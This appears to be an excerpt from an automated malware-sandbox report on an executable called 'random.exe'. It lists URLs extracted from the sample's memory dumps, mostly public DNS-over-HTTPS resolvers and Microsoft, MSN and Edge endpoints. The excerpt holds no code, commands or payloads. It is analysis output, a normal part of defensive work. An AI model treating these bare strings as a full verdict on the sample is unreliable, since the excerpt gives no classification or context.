Source: random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.google/dns-query
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.levonet.sk/dns-query
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/Char
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: random.exe, 00000000.00000003.2239960577.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: random.exe, 00000000.00000003.2239960577.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: random.exe, 00000000.00000003.2239960577.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
Source: random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com
Source: random.exe, 00000000.00000003.2285660581.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net/?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR30r4b&FrontEnd=AF
Source: random.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR31r5d&FrontEnd=AFD
Source: random.exe, 00000000.00000003.2168129632.000001D2E6CC4000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: random.exe, 00000000.00000003.2167647087.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: random.exe, 00000000.00000003.2167647087.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/assetr%26uc%26ping
Source: random.exe, 00000000.00000003.2167647087.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: random.exe, 00000000.00000003.2167647087.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/assety%3D
Source: random.exe, 00000000.00000003.2167647087.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: random.exe, 00000000.00000003.2149103706.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: random.exe, 00000000.00000003.2167647087.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: random.exe, 00000000.00000003.2149378613.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2168129632.000001D2E6CBA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ent-api.msn.com/%22
Source: random.exe, 00000000.00000003.2186276781.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11MSkH.img
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t_
Source: random.exe, 00000000.00000003.2183806707.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1u24yb.img
Source: random.exe, 00000000.00000003.2183806707.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1u24yb.imgy%3Dother%26uc%26ping%3D%253D-1%
Source: random.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: random.exe, 00000000.00000003.2183806707.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAc9vHK.img
Source: random.exe, 00000000.00000003.2183806707.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAc9vHK.imgy%3Dother%26uc%26ping%3D
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: random.exe, 00000000.00000003.2186276781.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msBaE.img
Source: random.exe, 00000000.00000003.2186276781.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msKEr.img
Source: random.exe, 00000000.00000003.2186276781.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msKEr.img_
Source: random.exe, 00000000.00000003.2301128582.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2222756537.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241941349.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346037519.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347582659.000001D2EAA65000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2271684344.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA11MSkH
Source: random.exe, 00000000.00000003.2222756537.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241941349.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346037519.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347582659.000001D2EAA65000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2271684344.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA11MSkHLast-Modified:
Source: random.exe, 00000000.00000003.2183806707.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL
Source: random.exe, 00000000.00000003.2183806707.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA13Q6ALX-Source-Length:
Source: random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh
Source: random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1hk7ShX-Source-Length:
Source: random.exe, 00000000.00000003.2286006061.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1u24yb
Source: random.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: random.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=tLast-Modified:
Source: random.exe, 00000000.00000003.2346037519.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347582659.000001D2EAA65000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: random.exe, 00000000.00000003.2346037519.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347582659.000001D2EAA65000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=tX-Source-Length:
Source: random.exe, 00000000.00000003.2188643666.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2186276781.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G
Source: random.exe, 00000000.00000003.2188643666.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2186276781.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6GX-Source-Length:
Source: random.exe, 00000000.00000003.2222756537.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241941349.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msBaE
Source: random.exe, 00000000.00000003.2222756537.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241941349.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msBaELast-Modified:
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msDBP
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msDBPX-Source-Length:
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Char
Source: random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/
Source: random.exe, 00000000.00000003.2297962610.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msn.com
Source: random.exe, 00000000.00000003.2272417273.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241273660.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msn.om
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacy
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacyr
Source: random.exe, 00000000.00000003.2206755988.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2222912824.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2273159384.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2258616094.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.
Source: random.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2202949497.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
Source: random.exe, 00000000.00000003.2189773191.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298846054.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2258616094.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/
Source: random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/&l
Source: random.exe, 00000000.00000003.2301128582.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/e6
Source: random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New
Source: random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: random.exe, 00000000.00000003.2286006061.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/of
Source: random.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comAccess-Control-Allow-Credentials:
Source: random.exe, 00000000.00000003.2300693729.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2301271733.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2227659960.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206755988.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346037519.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241455616.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285601633.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2222912824.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2205989098.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2273159384.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2271684344.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2258616094.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257548362.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comAccess-Control-Expose-Headers:
Source: random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2168129632.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comcache-control:public
Source: random.exe, 00000000.00000003.2286126023.000001D2E6C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to
Source: random.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:
Source: random.exe, 00000000.00000003.2286126023.000001D2E6C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comsec-fetch-sitesame-sitesec-fetch-modecorssec-fetch-destemptyrefererhttps://ntp.ms
Source: random.exe, 00000000.00000003.2222756537.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241941349.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comx
Source: random.exe, 00000000.00000003.2239960577.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comx-as-suppresssetcookie1cache-controlpublic
Source: random.exe, 00000000.00000003.2221845562.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comx-as-suppresssetcookie:1cache-control:private
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odvr.nic.cz/doh
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2205678914.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2149103706.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2183806707.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2167647087.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/r
Source: random.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r.msftstatic.com/
Source: random.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r.msftstatic.com/GMT
Source: random.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r.msftstatic.com/nT
